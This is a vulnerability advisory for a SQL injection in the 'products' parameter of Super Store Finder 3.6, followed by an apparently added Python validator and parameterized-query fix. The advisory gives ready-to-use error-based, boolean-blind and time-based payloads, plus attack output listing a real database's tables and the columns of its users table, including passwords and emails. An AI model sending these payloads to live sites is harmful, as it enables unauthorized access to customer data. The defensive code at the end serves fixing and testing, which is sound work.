Super Store Finder 3.6 SQL Injection
Super Store Finder version 3.6 suffers from a remote SQL injection vulnerability.
[ Vulnerability ]

Author    : CraCkEr
Website   : https://codecanyon.net/item/super-store-finder/3630922
Vendor    : Super Store Finder
Software  : Super Store Finder 3.6
Vuln Type : SQL Injection
Impact    : Database Access

Release Notes:
==============

SQL injection attacks can allow unauthorized access to sensitive data, modification of
data and crash the application or make it unavailable, leading to lost revenue and
damage to a company's reputation.

Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09, indoushka

CryptoJob (Twitter) twitter.com/0x0CryptoJob

© CraCkEr 2023

Path: /index.php

---------------------------------------------------------------------------------
POST /products/superstorefinder/index.php HTTP/1.1

ajax=1&action=get_nearby_stores&distance=200&lat=40.7127753&lng=-74.0059728&products=347[SQLI]
---------------------------------------------------------------------------------

POST parameter 'products' is vulnerable to SQL Injection

---
Parameter: products (POST)
    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: ajax=1&action=get_nearby_stores&distance=200&lat=40.7127753&lng=-74.0059728&products=347' AND GTID_SUBSET(CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44),1337)-- wXyW

    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ajax=1&action=get_nearby_stores&distance=200&lat=40.7127753&lng=-74.0059728&products=347' AND 04872=4872-- wXyW

    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (IF - comment)
    Payload: ajax=1&action=get_nearby_stores&distance=200&lat=40.7127753&lng=-74.0059728&products=347'XOR(IF(now()=sysdate(),SLEEP(6),0))XOR'Z
---

[+] Starting the Attack

fetching current database
current database: 'superstor_***'

fetching tables
[8 tables]
+--------------+
| categories_b |
| categories   |
| stores_c     |
| categories_c |
| stores_b     |
| users_b      |
| users        |
| stores       |
+--------------+

fetching columns for table 'users'
[11 columns]
+-------------+
| id          |
| username    |
| password    |
| firstname   |
| lastname    |
| facebook_id |
| address     |
| email       |
| created     |
| modified    |
| status      |
+-------------+

[-] Done
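
A server-side check for the request shown above, added here as an example; it is not Super Store Finder's code. It assumes the parameter formats seen in the sample request, that 'products' is a comma-separated list of numeric ids, and a hypothetical column name `product_id`. The validated ids are bound as query parameters rather than concatenated into SQL.

```python
import re
from urllib.parse import parse_qsl

# Assumed formats, inferred from the sample request in the advisory.
# [0-9] is used instead of \d so Unicode digits are not accepted.
_INT = re.compile(r"[0-9]{1,6}")
_DEC = re.compile(r"-?[0-9]{1,3}(?:\.[0-9]{1,10})?")
_ID_LIST = re.compile(r"[0-9]{1,10}(?:,[0-9]{1,10})*")  # assumption: comma-separated ids
_EXPECTED = {"ajax", "action", "distance", "lat", "lng", "products"}


def parse_nearby_request(body: str) -> dict:
    """Return typed values for a get_nearby_stores body, or raise ValueError."""
    pairs = parse_qsl(body, keep_blank_values=True)
    names = [k for k, _ in pairs]
    if set(names) != _EXPECTED or len(names) != len(_EXPECTED):
        raise ValueError("unexpected, missing or repeated parameter")
    p = dict(pairs)
    if p["ajax"] != "1" or p["action"] != "get_nearby_stores":
        raise ValueError("ajax/action")
    for name, rule in (("distance", _INT), ("lat", _DEC),
                       ("lng", _DEC), ("products", _ID_LIST)):
        if not rule.fullmatch(p[name]):
            raise ValueError(name)
    lat, lng = float(p["lat"]), float(p["lng"])
    if not (-90 <= lat <= 90 and -180 <= lng <= 180):
        raise ValueError("lat/lng out of range")
    return {"distance": int(p["distance"]), "lat": lat, "lng": lng,
            "products": [int(x) for x in p["products"].split(",")]}


def products_clause(ids: list[int], column: str = "product_id") -> tuple[str, list[int]]:
    """Parameterized IN clause; `column` is a hypothetical name, never user input."""
    return f"{column} IN ({', '.join('?' for _ in ids)})", list(ids)


def is_rejected(body: str) -> bool:
    try:
        parse_nearby_request(body)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    base = "ajax=1&action=get_nearby_stores&distance=200&lat=40.7127753&lng=-74.0059728&products="
    # The last value is the boolean-based payload from the advisory.
    for tail in ("347", "347,12", "347' AND 04872=4872-- wXyW"):
        print(repr(tail), "rejected" if is_rejected(base + tail) else "accepted")
```

Input validation of this kind narrows what reaches the query; the bound parameters from `products_clause` are what remove the injection point.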